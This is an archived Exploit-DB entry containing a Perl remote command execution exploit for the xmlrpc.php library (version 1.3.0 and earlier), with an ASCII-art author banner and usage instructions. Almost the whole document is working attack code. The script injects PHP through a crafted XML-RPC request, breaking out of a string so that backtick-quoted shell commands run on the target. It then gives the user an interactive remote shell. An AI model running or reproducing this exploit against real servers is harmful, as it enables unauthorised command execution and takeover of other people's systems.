xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit 2

2005-07-04T00:00:00
ID EDB-ID:1083
Type exploitdb
Reporter dukenn
Modified 2005-07-04T00:00:00

Description

xmlrpc.php Library <= 1.3.0 Remote Command Execute Exploit (2). Webapps exploit for php platform

                                        
                                            #-------------------------------------------------------#
#                     /|                                #       
#                    | |                                #      
#                    | |                                #      
#       /\   ________| |___                             #       
#      /  \  \_______   __/                             #
#     /    \|\_____  | | _       _  _     _  ()___      #      
#    /  /\  \  ___ \ | |&lt;_&gt;  /  |  |  | || \ || | | |   #       
#   /  /__\  \|   \ || | _  /__ |_ |  | ||_/ || | |_|   #       
#  /  ______  \   | || || |   / |  |  | || \ || |   |   #       
# /  /      \  \  | || || |  /  |_ |_ |_||  \|| | \_|   #       
# \_/       |\_/  | || || | ___ _  _                    #       
#           | |   | || /| |  | |  | ||\/|               #       
#            \|    \||/  \|  | |_ |_||  |               #       
#                            | |  | ||  |               #       
#                            | |_ | ||  |               #       
#                                                       #
#         Original advisory by http://gulftech.org/     #
#         Exploit coded by dukenn (http://asteam.org)   #
#                                                       # 
#-------------------------------------------------------

#!/usr/bin/perl

use IO::Socket;

print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";

if ($ARGV[0] && $ARGV[1])
{
 $host = $ARGV[0];
 $xml = $ARGV[1];
 $sock = IO::Socket::INET-&gt;new( Proto =&gt; "tcp", PeerAddr =&gt; "$host", PeerPort =&gt; "80") || die "connecterror\n";
 while (1) {
    print '['.$host.']# ';
    $cmd = &lt;STDIN&gt;;
    chop($cmd);
    last if ($cmd eq 'exit');
    $xmldata = "&lt;?xml version=\"1.0\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;test.method&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&lt;name&gt;',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*&lt;/name&gt;&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;";
    print $sock "POST ".$xml." HTTP/1.1\n";
    print $sock "Host: ".$host."\n";
    print $sock "Content-Type: text/xml\n";
    print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
    $good=0;
    while ($ans = &lt;$sock&gt;)
       {
        if ($good == 1) { print "$ans"; }
        last if ($ans =~ /^_end_/);
        if ($ans =~ /^_begin_/) { $good = 1; }
       }
      if ($good==0) {print "Exploit Failed\n";exit();}
   }
 }
else {
 print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n";
 print "Example: perl xml.pl target.com /script/xmlrpc.php\n";
exit;
}

# milw0rm.com [2005-07-04]